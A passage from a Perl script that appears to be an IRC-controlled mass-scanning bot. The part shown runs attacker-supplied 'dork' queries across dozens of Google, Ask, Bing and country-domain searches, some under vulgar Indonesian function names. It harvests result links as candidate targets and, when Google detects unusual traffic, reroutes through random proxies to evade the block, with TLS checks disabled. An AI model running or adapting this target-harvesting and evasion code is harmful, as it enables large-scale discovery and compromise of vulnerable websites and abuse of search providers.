  5131.     if ($engine eq "Lithuania") { my @lithuania = jack11($dork."+site:lt"); push(@list,@lithuania);sleep(3); }
  5132.  
  5133.     if ($engine eq "Macedonia") { my @macedonia = jack15($dork."+site:mk"); push(@list,@macedonia);sleep(3); }        
  5134.  
  5135.     if ($engine eq "Malta") { my @malta = jack1($dork."+site:mt"); push(@list,@malta);sleep(3); }
  5136.  
  5137.     if ($engine eq "Mongolia") { my @mongolia = jack2($dork."+site:mn"); push(@list,@mongolia);sleep(3); }
  5138.  
  5139.     if ($engine eq "Mozambique") { my @mozambique = jack3($dork."+site:mz"); push(@list,@mozambique);sleep(3); }
  5140.  
  5141.     if ($engine eq "Namibia") { my @namibia = jack4($dork."+site:na"); push(@list,@namibia);sleep(3); }
  5142.  
  5143.     if ($engine eq "Nauru") { my @nauru = jack6($dork."+site:nr"); push(@list,@nauru);sleep(3); }
  5144.  
  5145.     if ($engine eq "Nepal") { my @nepal = jack7($dork."+site:np"); push(@list,@nepal);sleep(3); }
  5146.  
  5147.     if ($engine eq "NewZealand") { my @newzealand = jack8($dork."+site:nz"); push(@list,@newzealand);sleep(3); }
  5148.  
  5149.     if ($engine eq "Nigeria") { my @nigeria = jack9($dork."+site:ng"); push(@list,@nigeria);sleep(3); }
  5150.  
  5151.     if ($engine eq "Paraguay") { my @paraguay = jack10($dork."+site:py"); push(@list,@paraguay);sleep(3); }
  5152.  
  5153.     if ($engine eq "Peru") { my @peru = jack5($dork."+site:pe"); push(@list,@peru);sleep(3); }
  5154.  
  5155.     if ($engine eq "Portugal") { my @portugal = jack11($dork."+site:pt"); push(@list,@portugal);sleep(3); }
  5156.  
  5157.     if ($engine eq "PuertoRico") { my @puertorico = jack12($dork."+site:pr"); push(@list,@puertorico);sleep(3); }
  5158.  
  5159.     if ($engine eq "Qatar") { my @qatar = jack13($dork."+site:qa"); push(@list,@qatar);sleep(3); }    
  5160.  
  5161.     if ($engine eq "SaintLucia") { my @saintlucia = jack14($dork."+site:lc"); push(@list,@saintlucia);sleep(3); }
  5162.  
  5163.     if ($engine eq "Samoa") { my @samoa = jack15($dork."+site:ws"); push(@list,@samoa);sleep(3); }
  5164.  
  5165.     if ($engine eq "SaudiArabia") { my @saudiarabia = jack17($dork."+site:sa"); push(@list,@saudiarabia);sleep(3); }
  5166.  
  5167.     if ($engine eq "Senegal") { my @senegal = jack18($dork."+site:sn"); push(@list,@senegal);sleep(3); }
  5168.  
  5169.     if ($engine eq "Slovakia") { my @slovakia = jack16($dork."+site:sk"); push(@list,@slovakia);sleep(3); }
  5170.  
  5171.     if ($engine eq "Srilanka") { my @srilanka = jack19($dork."+site:lk"); push(@list,@srilanka);sleep(3); }
  5172.  
  5173.     if ($engine eq "Swaziland") { my @swaziland = jack20($dork."+site:sz"); push(@list,@swaziland);sleep(3); }
  5174.  
  5175.     if ($engine eq "Tajikistan") { my @tajikistan = jack1($dork."+site:tj"); push(@list,@tajikistan);sleep(3); }
  5176.  
  5177.     if ($engine eq "Tanzania") { my @tanzania = jack2($dork."+site:tz"); push(@list,@tanzania);sleep(3); }
  5178.  
  5179.     if ($engine eq "Tokelau") { my @tokelau = jack3($dork."+site:tk"); push(@list,@tokelau);sleep(3); }
  5180.  
  5181.     if ($engine eq "Tonga") { my @tonga = jack4($dork."+site:to"); push(@list,@tonga);sleep(3); }
  5182.  
  5183.     if ($engine eq "Tunisia") { my @tunisia = jack5($dork."+site:tn"); push(@list,@tunisia);sleep(3); }        
  5184.  
  5185.     if ($engine eq "Uruguay") { my @uruguay = jack6($dork."+site:uy"); push(@list,@uruguay);sleep(3); }
  5186.  
  5187.     if ($engine eq "Uzbekistan") { my @uzbekistan = jack7($dork."+site:uz"); push(@list,@uzbekistan);sleep(3); }
  5188.  
  5189.     if ($engine eq "Venezuela") { my @venezuela = jack8($dork."+site:ve"); push(@list,@venezuela);sleep(3); }
  5190.  
  5191.     if ($engine eq "Yemen") { my @yemen = jack9($dork."+site:ye"); push(@list,@yemen);sleep(3); }
  5192.  
  5193.     if ($engine eq "Yugoslavia") { my @yugoslavia = jack10($dork."+site:yu"); push(@list,@yugoslavia);sleep(3); }
  5194.  
  5195.     if ($engine eq "Zambia") { my @zambia = jack11($dork."+site:zm"); push(@list,@zambia);sleep(3); }
  5196.  
  5197.     if ($engine eq "Uganda") { my @uganda = jack12($dork."+site:ug"); push(@list,@uganda);sleep(3); }
  5198.  
  5199.     if ($engine eq "Trinidad") { my @trinidad = jack13($dork."+site:tt"); push(@list,@trinidad);sleep(3); }
  5200.  
  5201.     if ($engine eq "Zimbabwe") { my @zimbabwe = jack14($dork."+site:zw"); push(@list,@zimbabwe);sleep(3); }
  5202.  
  5203.     if ($engine eq "KonToL") { my @kontol = kontol($dork); push(@list,@kontol);sleep(3); }
  5204.  
  5205.     if ($engine eq "PePek") { my @pepek = pepek($dork); push(@list,@pepek);sleep(3); }
  5206.  
  5207.     if ($engine eq "TeTek") { my @tetek = tetek($dork); push(@list,@tetek);sleep(3); }
  5208.  
  5209.     if ($engine eq "ItiL") { my @itil = itil($dork); push(@list,@itil);sleep(3); }
  5210.  
  5211.     if ($engine eq "NenNen") { my @nennen = nennen($dork); push(@list,@nennen);sleep(3); }
  5212.  
  5213.     if ($engine eq "SuSu") { my @susu = susu($dork); push(@list,@susu);sleep(3); }
  5214.  
  5215.     if ($engine eq "BuahDada") { my @buahdada = buahdada($dork); push(@list,@buahdada);sleep(3); }
  5216.  
  5217.     if ($engine eq "PayuDara") { my @payudara = payudara($dork); push(@list,@payudara);sleep(3); }
  5218.  
  5219.     if ($engine eq "Kentot") { my @kentot = kentot($dork); push(@list,@kentot);sleep(3); }
  5220.  
  5221.     if ($engine eq "eMeL") { my @emel = emel($dork); push(@list,@emel);sleep(3); }
  5222.  
  5223.     if ($engine eq "OraL") { my @oral = oral($dork); push(@list,@oral);sleep(3); }
  5224.  
  5225.     if ($engine eq "Klitoris") { my @klitoris = klitoris($dork); push(@list,@klitoris);sleep(3); }
  5226.  
  5227.     if ($engine eq "Masturbasi") { my @masturbasi = masturbasi($dork); push(@list,@masturbasi);sleep(3); }
  5228.  
  5229.     if ($engine eq "Onani") { my @onani = onani($dork); push(@list,@onani);sleep(3); }
  5230.  
  5231.     if ($engine eq "Sperma") { my @sperma = sperma($dork); push(@list,@sperma);sleep(3); }            
  5232.  
  5233.     if ($engine eq "AnaL") { my @anal = anal($dork); push(@list,@anal);sleep(3); }
  5234.  
  5235.     if ($engine eq "Puting") { my @puting = puting($dork); push(@list,@puting);sleep(3); }    
  5236.  
  5237.     if ($engine eq "Vagina") { my @vagina = vagina($dork); push(@list,@vagina);sleep(3); }
  5238.  
  5239.     if ($engine eq "Penis") { my @penis = penis($dork); push(@list,@penis);sleep(3); }
  5240.  
  5241.     if ($engine eq "MeMek") { my @memek = memek($dork); push(@list,@memek);sleep(3); }
  5242.  
  5243.     if ($engine eq "GooGLe") { my @google = &google($dork); push(@list,@google);sleep(3); }
  5244.  
  5245.     if ($engine eq "GooGLeCA") { my @googleCA = googleCA($dork); push(@list,@googleCA);sleep(3); }
  5246.  
  5247.     if ($engine eq "GooGLeDE") { my @googleDE = googleDE($dork); push(@list,@googleDE);sleep(3); }
  5248.  
  5249.     if ($engine eq "GooGLeUK") { my @googleUK = googleUK($dork); push(@list,@googleUK);sleep(3); }
  5250.  
  5251.     if ($engine eq "GooGLeFR") { my @googleFR = googleFR($dork); push(@list,@googleFR);sleep(3); }
  5252.  
  5253.     if ($engine eq "GooGLeES") { my @googleES = googleES($dork); push(@list,@googleES);sleep(3); }
  5254.  
  5255.     if ($engine eq "GooGLeIT") { my @googleIT = googleIT($dork); push(@list,@googleIT);sleep(3); }
  5256.  
  5257.     if ($engine eq "GooGLeNL") { my @googleNL = googleNL($dork); push(@list,@googleNL);sleep(3); }
  5258.  
  5259.     if ($engine eq "GooGLeBE") { my @googleBE = googleBE($dork); push(@list,@googleBE);sleep(3); }
  5260.  
  5261.     if ($engine eq "GooGLeCH") { my @googleCH = googleCH($dork); push(@list,@googleCH);sleep(3); }
  5262.  
  5263.     if ($engine eq "GooGLeSE") { my @googleSE = googleSE($dork); push(@list,@googleSE);sleep(3); }
  5264.  
  5265.     if ($engine eq "GooGLeDK") { my @googleDK = googleDK($dork); push(@list,@googleDK);sleep(3); }
  5266.  
  5267.     if ($engine eq "GooGLeNO") { my @googleNO = googleNO($dork); push(@list,@googleNO);sleep(3); }
  5268.  
  5269.     if ($engine eq "GooGLeNZ") { my @googleNZ = googleNZ($dork); push(@list,@googleNZ);sleep(3); }
  5270.  
  5271.     if ($engine eq "GooGLeIE") { my @googleIE = googleIE($dork); push(@list,@googleIE);sleep(3); }
  5272.  
  5273.     if ($engine eq "GooGLeBR") { my @googleBR = googleBR($dork); push(@list,@googleBR);sleep(3); }
  5274.  
  5275.     if ($engine eq "GooGLeAR") { my @googleAR = googleAR($dork); push(@list,@googleAR);sleep(3); }
  5276.  
  5277.     if ($engine eq "GooGLeCO") { my @googleCO = googleCO($dork); push(@list,@googleCO);sleep(3); }
  5278.  
  5279.     if ($engine eq "GooGLeCU") { my @googleCU = googleCU($dork); push(@list,@googleCU);sleep(3); }
  5280.  
  5281.     if ($engine eq "GooGLeCL") { my @googleCL = googleCL($dork); push(@list,@googleCL);sleep(3); }
  5282.  
  5283.     if ($engine eq "GooGLeMX") { my @googleMX = googleMX($dork); push(@list,@googleMX);sleep(3); }
  5284.  
  5285.     if ($engine eq "GooGLeAU") { my @googleAU = googleAU($dork); push(@list,@googleAU);sleep(3); }
  5286.  
  5287.     if ($engine eq "GooGLeRU") { my @googleRU = googleRU($dork); push(@list,@googleRU);sleep(3); }
  5288.  
  5289.     if ($engine eq "GooGLeAT") { my @googleAT = googleAT($dork); push(@list,@googleAT);sleep(3); }
  5290.  
  5291.     if ($engine eq "GooGLePL") { my @googlePL = googlePL($dork); push(@list,@googlePL);sleep(3); }
  5292.  
  5293.     if ($engine eq "GooGLeIL") { my @googleIL = googleIL($dork); push(@list,@googleIL);sleep(3); }
  5294.  
  5295.     if ($engine eq "GooGLeTR") { my @googleTR = googleTR($dork); push(@list,@googleTR);sleep(3); }
  5296.  
  5297.     if ($engine eq "GooGLeUA") { my @googleUA = googleUA($dork); push(@list,@googleUA);sleep(3); }
  5298.  
  5299.     if ($engine eq "GooGLeGR") { my @googleGR = googleGR($dork); push(@list,@googleGR);sleep(3); }
  5300.  
  5301.     if ($engine eq "GooGLeJP") { my @googleJP = googleJP($dork); push(@list,@googleJP);sleep(3); }
  5302.  
  5303.     if ($engine eq "GooGLeCN") { my @googleCN = googleCN($dork); push(@list,@googleCN);sleep(3); }
  5304.  
  5305.     if ($engine eq "GooGLeMY") { my @googleMY = googleMY($dork); push(@list,@googleMY);sleep(3); }
  5306.  
  5307.     if ($engine eq "GooGLeTH") { my @googleTH = googleTH($dork); push(@list,@googleTH);sleep(3); }
  5308.  
  5309.     if ($engine eq "GooGLeIN") { my @googleIN = googleIN($dork); push(@list,@googleIN);sleep(3); }
  5310.  
  5311.     if ($engine eq "GooGLeKR") { my @googleKR = googleKR($dork); push(@list,@googleKR);sleep(3); }
  5312.  
  5313.     if ($engine eq "GooGLeRO") { my @googleRO = googleRO($dork); push(@list,@googleRO);sleep(3); }
  5314.  
  5315.     if ($engine eq "GooGLeTW") { my @googleTW = googleTW($dork); push(@list,@googleTW);sleep(3); }
  5316.  
  5317.     if ($engine eq "GooGLeZA") { my @googleZA = googleZA($dork); push(@list,@googleZA);sleep(3); }
  5318.  
  5319.     if ($engine eq "GooGLePT") { my @googlePT = googlePT($dork); push(@list,@googlePT);sleep(3); }
  5320.  
  5321.     if ($engine eq "AsKCA") { my @askCA = askCA($dork); push(@list,@askCA);sleep(3); }
  5322.  
  5323.     if ($engine eq "AsKDE") { my @askDE = askDE($dork); push(@list,@askDE);sleep(3); }
  5324.  
  5325.     if ($engine eq "AsKIT") { my @askIT = askIT($dork); push(@list,@askIT);sleep(3); }
  5326.  
  5327.     if ($engine eq "AsKUK") { my @askUK = askUK($dork); push(@list,@askUK);sleep(3); }
  5328.  
  5329.     if ($engine eq "AsKFR") { my @askFR = askFR($dork); push(@list,@askFR);sleep(3); }
  5330.  
  5331.     if ($engine eq "AsKES") { my @askES = askES($dork); push(@list,@askES);sleep(3); }
  5332.  
  5333.     if ($engine eq "AsKRU") { my @askRU = askRU($dork); push(@list,@askRU);sleep(3); }
  5334.  
  5335.     if ($engine eq "AsKNL") { my @askNL = askNL($dork); push(@list,@askNL);sleep(3); }
  5336.  
  5337.     if ($engine eq "AsKEU") { my @askEU = askEU($dork); push(@list,@askEU);sleep(3); }
  5338.  
  5339.     if ($engine eq "AsKPL") { my @askPL = askPL($dork); push(@list,@askPL);sleep(3); }
  5340.  
  5341.     if ($engine eq "AsKAT") { my @askAT = askAT($dork); push(@list,@askAT);sleep(3); }
  5342.  
  5343.     if ($engine eq "AsKSE") { my @askSE = askSE($dork); push(@list,@askSE);sleep(3); }
  5344.  
  5345.     if ($engine eq "AsKDK") { my @askDK = askDK($dork); push(@list,@askDK);sleep(3); }
  5346.  
  5347.     if ($engine eq "AsKNO") { my @askNO = askNO($dork); push(@list,@askNO);sleep(3); }
  5348.  
  5349.     if ($engine eq "AsKAU") { my @askAU = askAU($dork); push(@list,@askAU);sleep(3); }
  5350.  
  5351.     if ($engine eq "AsKBR") { my @askBR = askBR($dork); push(@list,@askBR);sleep(3); }
  5352.  
  5353.     if ($engine eq "AsKMX") { my @askMX = askMX($dork); push(@list,@askMX);sleep(3); }
  5354.  
  5355.     if ($engine eq "AsKJP") { my @askJP = askJP($dork); push(@list,@askJP);sleep(3); }
  5356.  
  5357.     if ($engine eq "BingDE") { my @bingDE = bingDE($dork); push(@list,@bingDE);sleep(3); }
  5358.  
  5359.     if ($engine eq "BingUK") { my @bingUK = bingUK($dork); push(@list,@bingUK);sleep(3); }
  5360.  
  5361.     if ($engine eq "BingCA") { my @bingCA = bingCA($dork); push(@list,@bingCA);sleep(3); }
  5362.  
  5363.     if ($engine eq "BingBR") { my @bingBR = bingBR($dork); push(@list,@bingBR);sleep(3); }
  5364.  
  5365.     if ($engine eq "BingFR") { my @bingFR = bingFR($dork); push(@list,@bingFR);sleep(3); }
  5366.  
  5367.     if ($engine eq "BingES") { my @bingES = bingES($dork); push(@list,@bingES);sleep(3); }
  5368.  
  5369.     if ($engine eq "BingIT") { my @bingIT = bingIT($dork); push(@list,@bingIT);sleep(3); }
  5370.  
  5371.     if ($engine eq "BingBE") { my @bingBE = bingBE($dork); push(@list,@bingBE);sleep(3); }
  5372.  
  5373.     if ($engine eq "BingNL") { my @bingNL = bingNL($dork); push(@list,@bingNL);sleep(3); }
  5374.  
  5375.     if ($engine eq "BingPT") { my @bingPT = bingPT($dork); push(@list,@bingPT);sleep(3); }
  5376.  
  5377.     if ($engine eq "BingNO") { my @bingNO = bingNO($dork); push(@list,@bingNO);sleep(3); }
  5378.  
  5379.     if ($engine eq "BingDK") { my @bingDK = bingDK($dork); push(@list,@bingDK);sleep(3); }
  5380.  
  5381.     if ($engine eq "BingSE") { my @bingSE = bingSE($dork); push(@list,@bingSE);sleep(3); }
  5382.  
  5383.     if ($engine eq "BingCH") { my @bingCH = bingCH($dork); push(@list,@bingCH);sleep(3); }
  5384.  
  5385.     if ($engine eq "BingNZ") { my @bingNZ = bingNZ($dork); push(@list,@bingNZ);sleep(3); }
  5386.  
  5387.     if ($engine eq "BingRU") { my @bingRU = bingRU($dork); push(@list,@bingRU);sleep(3); }
  5388.  
  5389.     if ($engine eq "BingJP") { my @bingJP = bingJP($dork); push(@list,@bingJP);sleep(3); }
  5390.  
  5391.     if ($engine eq "BingCN") { my @bingCN = bingCN($dork); push(@list,@bingCN);sleep(3); }
  5392.  
  5393.     if ($engine eq "BingKR") { my @bingKR = bingKR($dork); push(@list,@bingKR);sleep(3); }
  5394.  
  5395.     if ($engine eq "BingMX") { my @bingMX = bingMX($dork); push(@list,@bingMX);sleep(3); }
  5396.  
  5397.     if ($engine eq "BingAR") { my @bingAR = bingAR($dork); push(@list,@bingAR);sleep(3); }
  5398.  
  5399.     if ($engine eq "BingCL") { my @bingCL = bingCL($dork); push(@list,@bingCL);sleep(3); }
  5400.  
  5401.     if ($engine eq "BingAU") { my @bingAU = bingAU($dork); push(@list,@bingAU);sleep(3); }
  5402.  
  5403.    
  5404.  
  5405.     @clean = clean(@list);
  5406.  
  5407.         if (@clean > 0){
  5408.  
  5409.     #&msg("$chan","[4@15$engine15] 9+ 11[".scalar(@list). "]12 ");
  5410.  
  5411.     }
  5412.  
  5413.     return @clean;
  5414.  
  5415. }
  5416.  
  5417. #########################################
  5418.  
  5419. sub isFound() {
  5420.  
  5421.     my $status = 0;
  5422.  
  5423.     my $link = $_[0];
  5424.  
  5425.     my $reqexp = $_[1];
  5426.  
  5427.     my $res = get_content($link);
  5428.  
  5429.     if ($res =~ /$reqexp/) { $status = 1 }
  5430.  
  5431.     return $status;
  5432.  
  5433. }
  5434.  
  5435.  
  5436.  
  5437. sub get_content() {
  5438.  
  5439.     my $url = $_[0];
  5440.  
  5441.   #  my $ua = LWP::UserAgent->new(agent => $uagent);
  5442.  
  5443.    # $ua->timeout(20);
  5444.  
  5445.     my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0, SSL_version => 'TLSv1:!TLSv11:!TLSv12:!SSLv2:!SSLv3'});
  5446.  
  5447.     $ua->agent($uagent);
  5448.  
  5449.     $ua->timeout(20);  
  5450.  
  5451.     my $req = HTTP::Request->new(GET => $url);
  5452.  
  5453.     my $res = $ua->request($req);
  5454.  
  5455.     return $res->content;
  5456.  
  5457. }
  5458.  
  5459. ######################################### SEARCH ENGINE
  5460.  
  5461.  
  5462.  
  5463. sub jack() {
  5464.  
  5465.     my @list;
  5466.  
  5467.     my $key = $_[0];
  5468.  
  5469.     for (my $i=0; $i<=1000; $i+=100){
  5470.  
  5471.         my $search = ($jack1.uri_escape($key)."&num=100&start=".$i);
  5472.  
  5473.         my $res = search_engine_query($search);
  5474.  
  5475.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  5476.  
  5477.             my $link = $1;
  5478.  
  5479.             if ($link !~ /google/){
  5480.  
  5481.                 my @grep = &links($link);
  5482.  
  5483.                 push(@list,@grep);
  5484.  
  5485.             }
  5486.  
  5487.         }
  5488.  
  5489.     }
  5490.  
  5491.     return @list;
  5492.  
  5493. }
  5494.  
  5495.  
  5496.  
  5497. sub jack1() {
  5498.  
  5499.     my @list;
  5500.  
  5501.     my $key = $_[0];
  5502.  
  5503.     for (my $i=0; $i<=1000; $i+=100){
  5504.  
  5505.         my $search = ($jack1.uri_escape($key)."&num=100&start=".$i);
  5506.  
  5507.         my $res = search_engine_query($search);
  5508.  
  5509.        
  5510.  
  5511.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  5512.  
  5513.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  5514.  
  5515.                $jack1 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  5516.  
  5517.                $search = ($jack1.uri_escape($key)."&num=100&start=".$i);
  5518.  
  5519.                $res = &search_engine_query($search);
  5520.  
  5521.            }
  5522.  
  5523.            
  5524.  
  5525.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  5526.  
  5527.             my $link = $1;
  5528.  
  5529.             if ($link !~ /google/){
  5530.  
  5531.                 my @grep = &links($link);
  5532.  
  5533.                 push(@list,@grep);
  5534.  
  5535.                 }
  5536.  
  5537.             }
  5538.  
  5539.         }  
  5540.  
  5541.         return @list;
  5542.  
  5543.     }
  5544.  
  5545.  
  5546.  
  5547.  
  5548.  
  5549. sub jack2() {
  5550.  
  5551.     my @list;
  5552.  
  5553.     my $key = $_[0];
  5554.  
  5555.     for (my $i=0; $i<=1000; $i+=100){
  5556.  
  5557.         my $search = ($jack2.uri_escape($key)."&num=100&start=".$i);
  5558.  
  5559.         my $res = search_engine_query($search);
  5560.  
  5561.        
  5562.  
  5563.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  5564.  
  5565.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  5566.  
  5567.                $jack2 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  5568.  
  5569.                $search = ($jack2.uri_escape($key)."&num=100&start=".$i);
  5570.  
  5571.                $res = &search_engine_query($search);
  5572.  
  5573.            }
  5574.  
  5575.            
  5576.  
  5577.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  5578.  
  5579.             my $link = $1;
  5580.  
  5581.             if ($link !~ /google/){
  5582.  
  5583.                 my @grep = &links($link);
  5584.  
  5585.                 push(@list,@grep);
  5586.  
  5587.                 }
  5588.  
  5589.             }
  5590.  
  5591.         }  
  5592.  
  5593.         return @list;
  5594.  
  5595.     }
  5596.  
  5597.  
  5598.  
  5599. sub jack3() {
  5600.  
  5601.     my @list;
  5602.  
  5603.     my $key = $_[0];
  5604.  
  5605.     for (my $i=0; $i<=1000; $i+=100){
  5606.  
  5607.         my $search = ($jack3.uri_escape($key)."&num=100&start=".$i);
  5608.  
  5609.         my $res = search_engine_query($search);
  5610.  
  5611.        
  5612.  
  5613.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  5614.  
  5615.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  5616.  
  5617.                $jack3 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  5618.  
  5619.                $search = ($jack3.uri_escape($key)."&num=100&start=".$i);
  5620.  
  5621.                $res = &search_engine_query($search);
  5622.  
  5623.            }
  5624.  
  5625.            
  5626.  
  5627.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  5628.  
  5629.             my $link = $1;
  5630.  
  5631.             if ($link !~ /google/){
  5632.  
  5633.                 my @grep = &links($link);
  5634.  
  5635.                 push(@list,@grep);
  5636.  
  5637.                 }
  5638.  
  5639.             }
  5640.  
  5641.         }  
  5642.  
  5643.         return @list;
  5644.  
  5645.     }
  5646.  
  5647.  
  5648.  
  5649. sub jack4() {
  5650.  
  5651.     my @list;
  5652.  
  5653.     my $key = $_[0];
  5654.  
  5655.     for (my $i=0; $i<=1000; $i+=100){
  5656.  
  5657.         my $search = ($jack4.uri_escape($key)."&num=100&start=".$i);
  5658.  
  5659.         my $res = search_engine_query($search);
  5660.  
  5661.        
  5662.  
  5663.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  5664.  
  5665.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  5666.  
  5667.                $jack4 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  5668.  
  5669.                $search = ($jack4.uri_escape($key)."&num=100&start=".$i);
  5670.  
  5671.                $res = &search_engine_query($search);
  5672.  
  5673.            }
  5674.  
  5675.            
  5676.  
  5677.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  5678.  
  5679.             my $link = $1;
  5680.  
  5681.             if ($link !~ /google/){
  5682.  
  5683.                 my @grep = &links($link);
  5684.  
  5685.                 push(@list,@grep);
  5686.  
  5687.                 }
  5688.  
  5689.             }
  5690.  
  5691.         }  
  5692.  
  5693.         return @list;
  5694.  
  5695.     }
  5696.  
  5697.  
  5698.  
  5699. sub jack5() {
  5700.  
  5701.     my @list;
  5702.  
  5703.     my $key = $_[0];
  5704.  
  5705.     for (my $i=0; $i<=1000; $i+=100){
  5706.  
  5707.         my $search = ($jack5.uri_escape($key)."&num=100&start=".$i);
  5708.  
  5709.         my $res = search_engine_query($search);
  5710.  
  5711.        
  5712.  
  5713.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  5714.  
  5715.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  5716.  
  5717.                $jack5 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  5718.  
  5719.                $search = ($jack5.uri_escape($key)."&num=100&start=".$i);
  5720.  
  5721.                $res = &search_engine_query($search);
  5722.  
  5723.            }
  5724.  
  5725.            
  5726.  
  5727.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  5728.  
  5729.             my $link = $1;
  5730.  
  5731.             if ($link !~ /google/){
  5732.  
  5733.                 my @grep = &links($link);
  5734.  
  5735.                 push(@list,@grep);
  5736.  
  5737.                 }
  5738.  
  5739.             }
  5740.  
  5741.         }  
  5742.  
  5743.         return @list;
  5744.  
  5745.     }
  5746.  
  5747.  
  5748.  
  5749. sub jack6() {
  5750.  
  5751.     my @list;
  5752.  
  5753.     my $key = $_[0];
  5754.  
  5755.     for (my $i=0; $i<=1000; $i+=100){
  5756.  
  5757.         my $search = ($jack6.uri_escape($key)."&num=100&start=".$i);
  5758.  
  5759.         my $res = search_engine_query($search);
  5760.  
  5761.        
  5762.  
  5763.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  5764.  
  5765.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  5766.  
  5767.                $jack6 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  5768.  
  5769.                $search = ($jack6.uri_escape($key)."&num=100&start=".$i);
  5770.  
  5771.                $res = &search_engine_query($search);
  5772.  
  5773.            }
  5774.  
  5775.            
  5776.  
  5777.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  5778.  
  5779.             my $link = $1;
  5780.  
  5781.             if ($link !~ /google/){
  5782.  
  5783.                 my @grep = &links($link);
  5784.  
  5785.                 push(@list,@grep);
  5786.  
  5787.                 }
  5788.  
  5789.             }
  5790.  
  5791.         }  
  5792.  
  5793.         return @list;
  5794.  
  5795.     }
  5796.  
  5797.  
  5798.  
  5799. sub jack7() {
  5800.  
  5801.     my @list;
  5802.  
  5803.     my $key = $_[0];
  5804.  
  5805.     for (my $i=0; $i<=1000; $i+=100){
  5806.  
  5807.         my $search = ($jack7.uri_escape($key)."&num=100&start=".$i);
  5808.  
  5809.         my $res = search_engine_query($search);
  5810.  
  5811.        
  5812.  
  5813.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  5814.  
  5815.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  5816.  
  5817.                $jack7 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  5818.  
  5819.                $search = ($jack7.uri_escape($key)."&num=100&start=".$i);
  5820.  
  5821.                $res = &search_engine_query($search);
  5822.  
  5823.            }
  5824.  
  5825.            
  5826.  
  5827.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  5828.  
  5829.             my $link = $1;
  5830.  
  5831.             if ($link !~ /google/){
  5832.  
  5833.                 my @grep = &links($link);
  5834.  
  5835.                 push(@list,@grep);
  5836.  
  5837.                 }
  5838.  
  5839.             }
  5840.  
  5841.         }  
  5842.  
  5843.         return @list;
  5844.  
  5845.     }
  5846.  
  5847.  
  5848.  
  5849. sub jack8() {
  5850.  
  5851.     my @list;
  5852.  
  5853.     my $key = $_[0];
  5854.  
  5855.     for (my $i=0; $i<=1000; $i+=100){
  5856.  
  5857.         my $search = ($jack8.uri_escape($key)."&num=100&start=".$i);
  5858.  
  5859.         my $res = search_engine_query($search);
  5860.  
  5861.        
  5862.  
  5863.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  5864.  
  5865.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  5866.  
  5867.                $jack8 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  5868.  
  5869.                $search = ($jack8.uri_escape($key)."&num=100&start=".$i);
  5870.  
  5871.                $res = &search_engine_query($search);
  5872.  
  5873.            }
  5874.  
  5875.            
  5876.  
  5877.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  5878.  
  5879.             my $link = $1;
  5880.  
  5881.             if ($link !~ /google/){
  5882.  
  5883.                 my @grep = &links($link);
  5884.  
  5885.                 push(@list,@grep);
  5886.  
  5887.                 }
  5888.  
  5889.             }
  5890.  
  5891.         }  
  5892.  
  5893.         return @list;
  5894.  
  5895.     }
  5896.  
  5897.  
  5898.  
  5899. sub jack9() {
  5900.  
  5901.     my @list;
  5902.  
  5903.     my $key = $_[0];
  5904.  
  5905.     for (my $i=0; $i<=1000; $i+=100){
  5906.  
  5907.         my $search = ($jack9.uri_escape($key)."&num=100&start=".$i);
  5908.  
  5909.         my $res = search_engine_query($search);
  5910.  
  5911.        
  5912.  
  5913.         if($res =~ /ipv4\.google\.com/ || $res =~ /ipv6\.google\.com/|| $res =~ /detected\sunusual\straffic/) {
  5914.  
  5915.                $rand1 = $randombarner[rand(scalar(@randombarner))];
  5916.  
  5917.                $jack9 = $rand1."?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
  5918.  
  5919.                $search = ($jack9.uri_escape($key)."&num=100&start=".$i);
  5920.  
  5921.                $res = &search_engine_query($search);
  5922.  
  5923.            }
  5924.  
  5925.            
  5926.  
  5927.         while ($res =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) {
  5928.  
  5929.             my $link = $1;
